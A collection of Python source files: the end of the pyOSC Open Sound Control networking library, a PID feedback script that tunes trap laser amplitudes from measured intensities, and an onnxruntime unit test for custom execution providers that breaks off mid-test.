self.setClient(client)
def setClient(self, client):
"""Associate this Server with a new local Client instance, closing the Client this Server is currently using.
"""
if not isinstance(client, OSCClient):
raise ValueError("'client' argument is not a valid OSCClient object")
if client.server != None:
raise OSCServerError("Provided OSCClient already has an OSCServer-instance: %s" % str(client.server))
# Server socket is already listening at this point, so we can't use the client's socket.
# we'll have to force our socket on the client...
client_address = client.address() # client may be already connected
client.close() # shut-down that socket
# force our socket upon the client
client.setServer(self)
if client_address:
client.connect(client_address)
if not self.return_port:
self.return_port = client_address[1]
def serve_forever(self):
"""Handle one request at a time until server is closed."""
self.running = True
while self.running:
self.handle_request() # this times-out when no data arrives.
def close(self):
"""Stops serving requests, closes server (socket), closes used client
"""
self.running = False
self.client.close()
self.server_close()
def __str__(self):
"""Returns a string containing this Server's Class-name, software-version and local bound address (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.address()
if addr:
out += " listening on osc://%s" % getUrlStr(addr)
else:
out += " (unbound)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
return cmp(self.socket._sock, other.socket._sock)
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
def address(self):
"""Returns a (host,port) tuple of the local address this server is bound to,
or None if not bound to any address.
"""
try:
return self.socket.getsockname()
except socket.error:
return None
def setReturnPort(self, port):
"""Set the destination UDP-port for replies returning from this server to the remote client
"""
if (port > 1024) and (port < 65536):
self.return_port = port
else:
self.return_port = None
def setSrvInfoPrefix(self, pattern):
"""Set the first part of OSC-address (pattern) this server will use to reply to server-info requests.
"""
if len(pattern):
pattern = '/' + pattern.strip('/')
self.info_prefix = pattern
def setSrvErrorPrefix(self, pattern=""):
"""Set the OSC-address (pattern) this server will use to report errors occuring during
received message handling to the remote client.
If pattern is empty (default), server-errors are not reported back to the client.
"""
if len(pattern):
pattern = '/' + pattern.strip('/')
self.error_prefix = pattern
def addDefaultHandlers(self, prefix="", info_prefix="/info", error_prefix="/error"):
"""Register a default set of OSC-address handlers with this Server:
- 'default' -> noCallback_handler
the given prefix is prepended to all other callbacks registered by this method:
- '<prefix><info_prefix' -> serverInfo_handler
- '<prefix><error_prefix> -> msgPrinter_handler
- '<prefix>/print' -> msgPrinter_handler
and, if the used Client supports it;
- '<prefix>/subscribe' -> subscription_handler
- '<prefix>/unsubscribe' -> subscription_handler
Note: the given 'error_prefix' argument is also set as default 'error_prefix' for error-messages
*sent from* this server. This is ok, because error-messages generally do not elicit a reply from the receiver.
To do this with the serverInfo-prefixes would be a bad idea, because if a request received on '/info' (for example)
would send replies to '/info', this could potentially cause a never-ending loop of messages!
Do *not* set the 'info_prefix' here (for incoming serverinfo requests) to the same value as given to
the setSrvInfoPrefix() method (for *replies* to incoming serverinfo requests).
For example, use '/info' for incoming requests, and '/inforeply' or '/serverinfo' or even just '/print' as the
info-reply prefix.
"""
self.error_prefix = error_prefix
self.addMsgHandler('default', self.noCallback_handler)
self.addMsgHandler(prefix + info_prefix, self.serverInfo_handler)
self.addMsgHandler(prefix + error_prefix, self.msgPrinter_handler)
self.addMsgHandler(prefix + '/print', self.msgPrinter_handler)
if isinstance(self.client, OSCMultiClient):
self.addMsgHandler(prefix + '/subscribe', self.subscription_handler)
self.addMsgHandler(prefix + '/unsubscribe', self.subscription_handler)
def printErr(self, txt):
"""Writes 'OSCServer: txt' to sys.stderr
"""
sys.stderr.write("OSCServer: %s\n" % txt)
def sendOSCerror(self, txt, client_address):
"""Sends 'txt', encapsulated in an OSCMessage to the default 'error_prefix' OSC-addres.
Message is sent to the given client_address, with the default 'return_port' overriding
the client_address' port, if defined.
"""
lines = txt.split('\n')
if len(lines) == 1:
msg = OSCMessage(self.error_prefix)
msg.append(lines[0])
elif len(lines) > 1:
msg = OSCBundle(self.error_prefix)
for line in lines:
msg.append(line)
else:
return
if self.return_port:
client_address = (client_address[0], self.return_port)
self.client.sendto(msg, client_address)
def reportErr(self, txt, client_address):
"""Writes 'OSCServer: txt' to sys.stderr
If self.error_prefix is defined, sends 'txt' as an OSC error-message to the client(s)
(see printErr() and sendOSCerror())
"""
self.printErr(txt)
if len(self.error_prefix):
self.sendOSCerror(txt, client_address)
def sendOSCinfo(self, txt, client_address):
"""Sends 'txt', encapsulated in an OSCMessage to the default 'info_prefix' OSC-addres.
Message is sent to the given client_address, with the default 'return_port' overriding
the client_address' port, if defined.
"""
lines = txt.split('\n')
if len(lines) == 1:
msg = OSCMessage(self.info_prefix)
msg.append(lines[0])
elif len(lines) > 1:
msg = OSCBundle(self.info_prefix)
for line in lines:
msg.append(line)
else:
return
if self.return_port:
client_address = (client_address[0], self.return_port)
self.client.sendto(msg, client_address)
###
# Message-Handler callback functions
###
def handle_error(self, request, client_address):
"""Handle an exception in the Server's callbacks gracefully.
Writes the error to sys.stderr and, if the error_prefix (see setSrvErrorPrefix()) is set,
sends the error-message as reply to the client
"""
(e_type, e) = sys.exc_info()[:2]
self.printErr("%s on request from %s: %s" % (e_type.__name__, getUrlStr(client_address), str(e)))
if self.print_tracebacks:
import traceback
traceback.print_exc() # XXX But this goes to stderr!
if len(self.error_prefix):
self.sendOSCerror("%s: %s" % (e_type.__name__, str(e)), client_address)
def noCallback_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registerd handlers must accept these three arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registerd OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler prints a "No callback registered to handle ..." message.
Returns None
"""
self.reportErr("No callback registered to handle OSC-address '%s'" % addr, client_address)
def msgPrinter_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registerd handlers must accept these three arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registerd OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler prints the received message.
Returns None
"""
txt = "OSCMessage '%s' from %s: " % (addr, getUrlStr(client_address))
txt += str(data)
self.printErr(txt) # strip trailing comma & space
def serverInfo_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registerd handlers must accept these three arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registerd OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler returns a reply to the client, which can contain various bits of information
about this server, depending on the first argument of the received OSC-message:
- 'help' | 'info' : Reply contains server type & version info, plus a list of
available 'commands' understood by this handler
- 'list' | 'ls' : Reply is a bundle of 'address <string>' messages, listing the server's
OSC address-space.
- 'clients' | 'targets' : Reply is a bundle of 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
messages, listing the local Client-instance's subscribed remote clients.
"""
if len(data) == 0:
return None
cmd = data.pop(0)
reply = None
if cmd in ('help', 'info'):
reply = OSCBundle(self.info_prefix)
reply.append(('server', str(self)))
reply.append(('info_command', "ls | list : list OSC address-space"))
reply.append(('info_command', "clients | targets : list subscribed clients"))
elif cmd in ('ls', 'list'):
reply = OSCBundle(self.info_prefix)
for addr in self.callbacks.keys():
reply.append(('address', addr))
elif cmd in ('clients', 'targets'):
if hasattr(self.client, 'getOSCTargetStrings'):
reply = OSCBundle(self.info_prefix)
for trg in self.client.getOSCTargetStrings():
reply.append(('target',) + trg)
else:
cli_addr = self.client.address()
if cli_addr:
reply = OSCMessage(self.info_prefix)
reply.append(('target', "osc://%s/" % getUrlStr(cli_addr)))
else:
self.reportErr("unrecognized command '%s' in /info request from osc://%s. Try 'help'" % (cmd, getUrlStr(client_address)), client_address)
return reply
def _subscribe(self, data, client_address):
"""Handle the actual subscription. the provided 'data' is concatenated together to form a
'<host>:<port>[<prefix>] [<filter>] [...]' string, which is then passed to
parseUrlStr() & parseFilterStr() to actually retreive <host>, <port>, etc.
This 'long way 'round' approach (almost) guarantees that the subscription works,
regardless of how the bits of the <url> are encoded in 'data'.
"""
url = ""
have_port = False
for item in data:
if (type(item) == types.IntType) and not have_port:
url += ":%d" % item
have_port = True
elif type(item) in types.StringTypes:
url += item
(addr, tail) = parseUrlStr(url)
(prefix, filters) = parseFilterStr(tail)
if addr != None:
(host, port) = addr
if not host:
host = client_address[0]
if not port:
port = client_address[1]
addr = (host, port)
else:
addr = client_address
self.client._setTarget(addr, prefix, filters)
trg = self.client.getOSCTargetStr(addr)
if trg[0] != None:
reply = OSCMessage(self.info_prefix)
reply.append(('target',) + trg)
return reply
def _unsubscribe(self, data, client_address):
"""Handle the actual unsubscription. the provided 'data' is concatenated together to form a
'<host>:<port>[<prefix>]' string, which is then passed to
parseUrlStr() to actually retreive <host>, <port> & <prefix>.
This 'long way 'round' approach (almost) guarantees that the unsubscription works,
regardless of how the bits of the <url> are encoded in 'data'.
"""
url = ""
have_port = False
for item in data:
if (type(item) == types.IntType) and not have_port:
url += ":%d" % item
have_port = True
elif type(item) in types.StringTypes:
url += item
(addr, _) = parseUrlStr(url)
if addr == None:
addr = client_address
else:
(host, port) = addr
if not host:
host = client_address[0]
if not port:
try:
(host, port) = self.client._searchHostAddr(host)
except NotSubscribedError:
port = client_address[1]
addr = (host, port)
try:
self.client._delTarget(addr)
except NotSubscribedError, e:
txt = "%s: %s" % (e.__class__.__name__, str(e))
self.printErr(txt)
reply = OSCMessage(self.error_prefix)
reply.append(txt)
return reply
def subscription_handler(self, addr, tags, data, client_address):
"""Handle 'subscribe' / 'unsubscribe' requests from remote hosts,
if the local Client supports this (i.e. OSCMultiClient).
Supported commands:
- 'help' | 'info' : Reply contains server type & version info, plus a list of
available 'commands' understood by this handler
- 'list' | 'ls' : Reply is a bundle of 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
messages, listing the local Client-instance's subscribed remote clients.
- '[subscribe | listen | sendto | target] <url> [<filter> ...] : Subscribe remote client/server at <url>,
and/or set message-filters for messages being sent to the subscribed host, with the optional <filter>
arguments. Filters are given as OSC-addresses (or '*') prefixed by a '+' (send matching messages) or
a '-' (don't send matching messages). The wildcard '*', '+*' or '+/*' means 'send all' / 'filter none',
and '-*' or '-/*' means 'send none' / 'filter all' (which is not the same as unsubscribing!)
Reply is an OSCMessage with the (new) subscription; 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
- '[unsubscribe | silence | nosend | deltarget] <url> : Unsubscribe remote client/server at <url>
If the given <url> isn't subscribed, a NotSubscribedError-message is printed (and possibly sent)
The <url> given to the subscribe/unsubscribe handler should be of the form:
'[osc://][<host>][:<port>][<prefix>]', where any or all components can be omitted.
If <host> is not specified, the IP-address of the message's source is used.
If <port> is not specified, the <host> is first looked up in the list of subscribed hosts, and if found,
the associated port is used.
If <port> is not specified and <host> is not yet subscribed, the message's source-port is used.
If <prefix> is specified on subscription, <prefix> is prepended to the OSC-address of all messages
sent to the subscribed host.
If <prefix> is specified on unsubscription, the subscribed host is only unsubscribed if the host,
port and prefix all match the subscription.
If <prefix> is not specified on unsubscription, the subscribed host is unsubscribed if the host and port
match the subscription.
"""
if not isinstance(self.client, OSCMultiClient):
raise OSCServerError("Local %s does not support subsctiptions or message-filtering" % self.client.__class__.__name__)
addr_cmd = addr.split('/')[-1]
if len(data):
if data[0] in ('help', 'info'):
reply = OSCBundle(self.info_prefix)
reply.append(('server', str(self)))
reply.append(('subscribe_command', "ls | list : list subscribed targets"))
reply.append(('subscribe_command', "[subscribe | listen | sendto | target] <url> [<filter> ...] : subscribe to messages, set filters"))
reply.append(('subscribe_command', "[unsubscribe | silence | nosend | deltarget] <url> : unsubscribe from messages"))
return reply
if data[0] in ('ls', 'list'):
reply = OSCBundle(self.info_prefix)
for trg in self.client.getOSCTargetStrings():
reply.append(('target',) + trg)
return reply
if data[0] in ('subscribe', 'listen', 'sendto', 'target'):
return self._subscribe(data[1:], client_address)
if data[0] in ('unsubscribe', 'silence', 'nosend', 'deltarget'):
return self._unsubscribe(data[1:], client_address)
if addr_cmd in ('subscribe', 'listen', 'sendto', 'target'):
return self._subscribe(data, client_address)
if addr_cmd in ('unsubscribe', 'silence', 'nosend', 'deltarget'):
return self._unsubscribe(data, client_address)
class ForkingOSCServer(ForkingMixIn, OSCServer):
"""An Asynchronous OSCServer.
This server forks a new process to handle each incoming request.
"""
# set the RequestHandlerClass, will be overridden by ForkingOSCServer & ThreadingOSCServer
RequestHandlerClass = ThreadingOSCRequestHandler
class ThreadingOSCServer(ThreadingMixIn, OSCServer):
"""An Asynchronous OSCServer.
This server starts a new thread to handle each incoming request.
"""
# set the RequestHandlerClass, will be overridden by ForkingOSCServer & ThreadingOSCServer
RequestHandlerClass = ThreadingOSCRequestHandler
######
#
# OSCError classes
#
######
class OSCError(Exception):
"""Base Class for all OSC-related errors
"""
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class OSCClientError(OSCError):
"""Class for all OSCClient errors
"""
pass
class OSCServerError(OSCError):
"""Class for all OSCServer errors
"""
pass
class NoCallbackError(OSCServerError):
"""This error is raised (by an OSCServer) when an OSCMessage with an 'unmatched' address-pattern
is received, and no 'default' handler is registered.
"""
def __init__(self, pattern):
"""The specified 'pattern' should be the OSC-address of the 'unmatched' message causing the error to be raised.
"""
self.message = "No callback registered to handle OSC-address '%s'" % pattern
class NotSubscribedError(OSCClientError):
"""This error is raised (by an OSCMultiClient) when an attempt is made to unsubscribe a host
that isn't subscribed.
"""
def __init__(self, addr, prefix=None):
if prefix:
url = getUrlStr(addr, prefix)
else:
url = getUrlStr(addr, '')
self.message = "Target osc://%s is not subscribed" % url
######
#
# OSC over streaming transport layers (usually TCP)
#
# Note from the OSC 1.0 specifications about streaming protocols:
#
# The underlying network that delivers an OSC packet is responsible for
# delivering both the contents and the size to the OSC application. An OSC
# packet can be naturally represented by a datagram by a network protocol such
# as UDP. In a stream-based protocol such as TCP, the stream should begin with
# an int32 giving the size of the first packet, followed by the contents of the
# first packet, followed by the size of the second packet, etc.
#
# The contents of an OSC packet must be either an OSC Message or an OSC Bundle.
# The first byte of the packet's contents unambiguously distinguishes between
# these two alternatives.
#
######
class OSCStreamRequestHandler(StreamRequestHandler, OSCAddressSpace):
""" This is the central class of a streaming OSC server. If a client
connects to the server, the server instantiates a OSCStreamRequestHandler
for each new connection. This is fundamentally different to a packet
oriented server which has a single address space for all connections.
This connection based (streaming) OSC server maintains an address space
for each single connection, because usually tcp server spawn a new thread
or process for each new connection. This would generate severe
multithreading synchronization problems when each thread would operate on
the same address space object. Therefore: To implement a streaming/TCP OSC
server a custom handler must be implemented which implements the
setupAddressSpace member in which it creates its own address space for this
very connection. This has been done within the testbench and can serve as
inspiration.
"""
def __init__(self, request, client_address, server):
""" Initialize all base classes. The address space must be initialized
before the stream request handler because the initialization function
of the stream request handler calls the setup member which again
requires an already initialized address space.
"""
self._txMutex = threading.Lock()
OSCAddressSpace.__init__(self)
StreamRequestHandler.__init__(self, request, client_address, server)
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function"""
if decoded[0] != "#bundle":
self.replies += self.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def setup(self):
StreamRequestHandler.setup(self)
print "SERVER: New client connection."
self.setupAddressSpace()
self.server._clientRegister(self)
def setupAddressSpace(self):
""" Override this function to customize your address space. """
pass
def finish(self):
StreamRequestHandler.finish(self)
self.server._clientUnregister(self)
print "SERVER: Client connection handled."
def _transmit(self, data):
sent = 0
while sent < len(data):
tmp = self.connection.send(data[sent:])
if tmp == 0:
return False
sent += tmp
return True
def _transmitMsg(self, msg):
"""Send an OSC message over a streaming socket. Raises exception if it
should fail. If everything is transmitted properly, True is returned. If
socket has been closed, False.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
try:
binary = msg.getBinary()
length = len(binary)
# prepend length of packet before the actual message (big endian)
len_big_endian = array.array('c', '\0' * 4)
struct.pack_into(">L", len_big_endian, 0, length)
len_big_endian = len_big_endian.tostring()
if self._transmit(len_big_endian) and self._transmit(binary):
return True
return False
except socket.error, e:
if e[0] == errno.EPIPE: # broken pipe
return False
raise e
def _receive(self, count):
""" Receive a certain amount of data from the socket and return it. If the
remote end should be closed in the meanwhile None is returned.
"""
chunk = self.connection.recv(count)
if not chunk or len(chunk) == 0:
return None
while len(chunk) < count:
tmp = self.connection.recv(count - len(chunk))
if not tmp or len(tmp) == 0:
return None
chunk = chunk + tmp
return chunk
def _receiveMsg(self):
""" Receive OSC message from a socket and decode.
If an error occurs, None is returned, else the message.
"""
# get OSC packet size from stream which is prepended each transmission
chunk = self._receive(4)
if chunk == None:
print "SERVER: Socket has been closed."
return None
# extract message length from big endian unsigned long (32 bit)
slen = struct.unpack(">L", chunk)[0]
# receive the actual message
chunk = self._receive(slen)
if chunk == None:
print "SERVER: Socket has been closed."
return None
# decode OSC data and dispatch
msg = decodeOSC(chunk)
if msg == None:
raise OSCError("SERVER: Message decoding failed.")
return msg
def handle(self):
"""
Handle a connection.
"""
# set socket blocking to avoid "resource currently not available"
# exceptions, because the connection socket inherits the settings
# from the listening socket and this times out from time to time
# in order to provide a way to shut the server down. But we want
# clean and blocking behaviour here
self.connection.settimeout(None)
print "SERVER: Entered server loop"
try:
while True:
decoded = self._receiveMsg()
if decoded == None:
return
elif len(decoded) <= 0:
# if message decoding fails we try to stay in sync but print a message
print "OSC stream server: Spurious message received."
continue
self.replies = []
self._unbundle(decoded)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
# no replies, continue receiving
continue
self._txMutex.acquire()
txOk = self._transmitMsg(msg)
self._txMutex.release()
if not txOk:
break
except socket.error, e:
if e[0] == errno.ECONNRESET:
# if connection has been reset by client, we do not care much
# about it, we just assume our duty fullfilled
print "SERVER: Connection has been reset by peer."
else:
raise e
def sendOSC(self, oscData):
""" This member can be used to transmit OSC messages or OSC bundles
over the client/server connection. It is thread save.
"""
self._txMutex.acquire()
result = self._transmitMsg(oscData)
self._txMutex.release()
return result
""" TODO Note on threaded unbundling for streaming (connection oriented)
transport:
Threaded unbundling as implemented in ThreadingOSCServer must be implemented in
a different way for the streaming variant, because contrary to the datagram
version the streaming handler is instantiated only once per connection. This
leads to the problem (if threaded unbundling is implemented as in OSCServer)
that all further message reception is blocked until all (previously received)
pending messages are processed.
Each StreamRequestHandler should provide a so called processing queue in which
all pending messages or subbundles are inserted to be processed in the future).
When a subbundle or message gets queued, a mechanism must be provided that
those messages get invoked when time asks for them. There are the following
opportunities:
- a timer is started which checks at regular intervals for messages in the
queue (polling - requires CPU resources)
- a dedicated timer is started for each message (requires timer resources)
"""
class OSCStreamingServer(TCPServer):
""" A connection oriented (TCP/IP) OSC server.
"""
# define a socket timeout, so the serve_forever loop can actually exit.
# with 2.6 and server.shutdown this wouldn't be necessary
socket_timeout = 1
# this is the class which handles a new connection. Override this for a
# useful customized server. See the testbench for an example
RequestHandlerClass = OSCStreamRequestHandler
def __init__(self, address):
"""Instantiate an OSCStreamingServer.
- server_address ((host, port) tuple): the local host & UDP-port
the server listens for new connections.
"""
self._clientList = []
self._clientListMutex = threading.Lock()
TCPServer.__init__(self, address, self.RequestHandlerClass)
self.socket.settimeout(self.socket_timeout)
def serve_forever(self):
"""Handle one request at a time until server is closed.
Had to add this since 2.5 does not support server.shutdown()
"""
self.running = True
while self.running:
self.handle_request() # this times-out when no data arrives.
def start(self):
""" Start the server thread. """
self._server_thread = threading.Thread(target=self.serve_forever)
self._server_thread.setDaemon(True)
self._server_thread.start()
def stop(self):
""" Stop the server thread and close the socket. """
self.running = False
self._server_thread.join()
self.server_close()
# 2.6 only
#self.shutdown()
def _clientRegister(self, client):
""" Gets called by each request/connection handler when connection is
established to add itself to the client list
"""
self._clientListMutex.acquire()
self._clientList.append(client)
self._clientListMutex.release()
def _clientUnregister(self, client):
""" Gets called by each request/connection handler when connection is
lost to remove itself from the client list
"""
self._clientListMutex.acquire()
self._clientList.remove(client)
self._clientListMutex.release()
def broadcastToClients(self, oscData):
""" Send OSC message or bundle to all connected clients. """
result = True
for client in self._clientList:
result = result and client.sendOSC(oscData)
return result
class OSCStreamingServerThreading(ThreadingMixIn, OSCStreamingServer):
pass
""" Implements a server which spawns a separate thread for each incoming
connection. Care must be taken since the OSC address space is for all
the same.
"""
class OSCStreamingClient(OSCAddressSpace):
""" OSC streaming client.
A streaming client establishes a connection to a streaming server but must
be able to handle replies by the server as well. To accomplish this the
receiving takes place in a secondary thread, because no one knows if we
have to expect a reply or not, i.e. synchronous architecture doesn't make
much sense.
Replies will be matched against the local address space. If message
handlers access code of the main thread (where the client messages are sent
to the server) care must be taken e.g. by installing sychronization
mechanisms or by using an event dispatcher which can handle events
originating from other threads.
"""
# set outgoing socket buffer size
sndbuf_size = 4096 * 8
rcvbuf_size = 4096 * 8
def __init__(self):
self._txMutex = threading.Lock()
OSCAddressSpace.__init__(self)
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.sndbuf_size)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, self.rcvbuf_size)
self.socket.settimeout(1.0)
self._running = False
def _receiveWithTimeout(self, count):
chunk = str()
while len(chunk) < count:
try:
tmp = self.socket.recv(count - len(chunk))
except socket.timeout:
if not self._running:
print "CLIENT: Socket timed out and termination requested."
return None
else:
continue
except socket.error, e:
if e[0] == errno.ECONNRESET:
print "CLIENT: Connection reset by peer."
return None
else:
raise e
if not tmp or len(tmp) == 0:
print "CLIENT: Socket has been closed."
return None
chunk = chunk + tmp
return chunk
def _receiveMsgWithTimeout(self):
""" Receive OSC message from a socket and decode.
If an error occurs, None is returned, else the message.
"""
# get OSC packet size from stream which is prepended each transmission
chunk = self._receiveWithTimeout(4)
if not chunk:
return None
# extract message length from big endian unsigned long (32 bit)
slen = struct.unpack(">L", chunk)[0]
# receive the actual message
chunk = self._receiveWithTimeout(slen)
if not chunk:
return None
# decode OSC content
msg = decodeOSC(chunk)
if msg == None:
raise OSCError("CLIENT: Message decoding failed.")
return msg
def _receiving_thread_entry(self):
print "CLIENT: Entered receiving thread."
self._running = True
while self._running:
decoded = self._receiveMsgWithTimeout()
if not decoded:
break
elif len(decoded) <= 0:
continue
self.replies = []
self._unbundle(decoded)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
continue
self._txMutex.acquire()
txOk = self._transmitMsgWithTimeout(msg)
self._txMutex.release()
if not txOk:
break
print "CLIENT: Receiving thread terminated."
def _unbundle(self, decoded):
if decoded[0] != "#bundle":
self.replies += self.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.socket.getpeername())
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def connect(self, address):
self.socket.connect(address)
self.receiving_thread = threading.Thread(target=self._receiving_thread_entry)
self.receiving_thread.start()
def close(self):
# let socket time out
self._running = False
self.receiving_thread.join()
self.socket.close()
def _transmitWithTimeout(self, data):
sent = 0
while sent < len(data):
try:
tmp = self.socket.send(data[sent:])
except socket.timeout:
if not self._running:
print "CLIENT: Socket timed out and termination requested."
return False
else:
continue
except socket.error, e:
if e[0] == errno.ECONNRESET:
print "CLIENT: Connection reset by peer."
return False
else:
raise e
if tmp == 0:
return False
sent += tmp
return True
def _transmitMsgWithTimeout(self, msg):
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
binary = msg.getBinary()
length = len(binary)
# prepend length of packet before the actual message (big endian)
len_big_endian = array.array('c', '\0' * 4)
struct.pack_into(">L", len_big_endian, 0, length)
len_big_endian = len_big_endian.tostring()
if self._transmitWithTimeout(len_big_endian) and self._transmitWithTimeout(binary):
return True
else:
return False
def sendOSC(self, msg):
"""Send an OSC message or bundle to the server. Returns True on success.
"""
self._txMutex.acquire()
txOk = self._transmitMsgWithTimeout(msg)
self._txMutex.release()
return txOk
def __str__(self):
"""Returns a string containing this Client's Class-name, software-version
and the remote-address it is connected to (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.socket.getpeername()
if addr:
out += " connected to osc://%s" % getUrlStr(addr)
else:
out += " (unconnected)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
isequal = cmp(self.socket._sock, other.socket._sock)
if isequal and self.server and other.server:
return cmp(self.server, other.server)
return isequal
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
# vim:noexpandtab
|
TrapFeedback.py
|
from simple_pid import PID
import time
import threading
import urllib
import json
import ast
import math
class TrapFeedback(object):
def __init__(self, waveManager):
self.waveManager = waveManager
self.PIDs = []
self.P = .0005
self.I = .000002
self.D = .000001
self.setpoint = 1000
self.waitTime = .1
def updateAmplitudes(self, measuredIntensities, channel):
newAmplitudes = []
print ("updating")
for i in range(len(self.PIDs)):
newPower = self.PIDs[i](measuredIntensities[i])
newAmplitudes += [10.0**(newPower/10.0)]
print (str(newPower) + " " + str(measuredIntensities[i]))
self.waveManager.changeAmplitudes(channel, newAmplitudes)
self.waveManager.saveJsonData()
def initializePIDs(self, channel):
self.PIDs = []
currentAmplitudes = self.waveManager.getAmplitudes(channel)
print (len(currentAmplitudes))
for i in range(len(currentAmplitudes)):
self.PIDs += [PID(self.P, self.I, self.D, setpoint=self.setpoint, output_limits=(-20, 0))]
self.PIDs[i].auto_mode = False
self.PIDs[i].set_auto_mode(True, last_output=10*math.log10(currentAmplitudes[i]))
def measureIntensities(self, channel):
dataNames = ['yAmplitudes', 'xAmplitudes']
url = "http://128.104.162.32/peakData" #10.0.0.128
response = urllib.urlopen(url)
data = ast.literal_eval(response.read())
return data[dataNames[channel]]
def iteratePID(self, channel):
t = threading.currentThread()
self.running = True
while getattr(t, "run", True):
self.updateAmplitudes(self.measureIntensities(channel), channel)
time.sleep(self.waitTime)
if not self.running:
break
def startFeedback(self, channel):
self.feedback = threading.Thread(target=self.iteratePID, args=[channel])
self.feedback.start()
def stopFeedback(self):
self.running = False
self.feedback.join()
|
ort_eps_test.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import unittest
import torch
import onnxruntime_pybind11_state as torch_ort
import os
import sys
def is_windows():
return sys.platform.startswith("win")
from io import StringIO
import sys
import threading
import time
class OutputGrabber(object):
"""
Class used to grab standard output or another stream.
"""
escape_char = "\b"
def __init__(self, stream=None, threaded=False):
self.origstream = stream
self.threaded = threaded
if self.origstream is None:
self.origstream = sys.stdout
self.origstreamfd = self.origstream.fileno()
self.capturedtext = ""
# Create a pipe so the stream can be captured:
self.pipe_out, self.pipe_in = os.pipe()
def __enter__(self):
self.start()
return self
def __exit__(self, type, value, traceback):
self.stop()
def start(self):
"""
Start capturing the stream data.
"""
self.capturedtext = ""
# Save a copy of the stream:
self.streamfd = os.dup(self.origstreamfd)
# Replace the original stream with our write pipe:
os.dup2(self.pipe_in, self.origstreamfd)
if self.threaded:
# Start thread that will read the stream:
self.workerThread = threading.Thread(target=self.readOutput)
self.workerThread.start()
# Make sure that the thread is running and os.read() has executed:
time.sleep(0.01)
def stop(self):
"""
Stop capturing the stream data and save the text in `capturedtext`.
"""
# Print the escape character to make the readOutput method stop:
self.origstream.write(self.escape_char)
# Flush the stream to make sure all our data goes in before
# the escape character:
self.origstream.flush()
if self.threaded:
# wait until the thread finishes so we are sure that
# we have until the last character:
self.workerThread.join()
else:
self.readOutput()
# Close the pipe:
os.close(self.pipe_in)
os.close(self.pipe_out)
# Restore the original stream:
os.dup2(self.streamfd, self.origstreamfd)
# Close the duplicate stream:
os.close(self.streamfd)
def readOutput(self):
"""
Read the stream data (one byte at a time)
and save the text in `capturedtext`.
"""
while True:
char = os.read(self.pipe_out, 1).decode(self.origstream.encoding)
if not char or self.escape_char in char:
break
self.capturedtext += char
class OrtEPTests(unittest.TestCase):
def get_test_execution_provider_path(self):
if is_windows():
return os.path.join(".", "test_execution_provider.dll")
else:
return os.path.join(".", "libtest_execution_provider.so")
def test_import_custom_eps(self):
torch_ort.set_device(0, "CPUExecutionProvider", {})
torch_ort._register_provider_lib("TestExecutionProvider", self.get_test_execution_provider_path(), {})
# capture std out
with OutputGrabber() as out:
torch_ort.set_device(1, "TestExecutionProvider", {"device_id": "0", "some_config": "val"})
ort_device = torch_ort.device(1)
assert "My EP provider created, with device id: 0, some_option: val" in out.capturedtext
with OutputGrabber() as out:
torch_ort.set_device(2, "TestExecutionProvider", {"device_id": "1", "some_config": "val"})
ort_device = torch_ort.device(1)
assert "My EP provider created, with device id: 1, some_option: val" in out.capturedtext
# test the reusing EP instance
with OutputGrabber() as out:
torch_ort.set_device(3, "TestExecutionProvider", {"device_id": "0", "some_config": "val"})
ort_device = torch_ort.device(1)
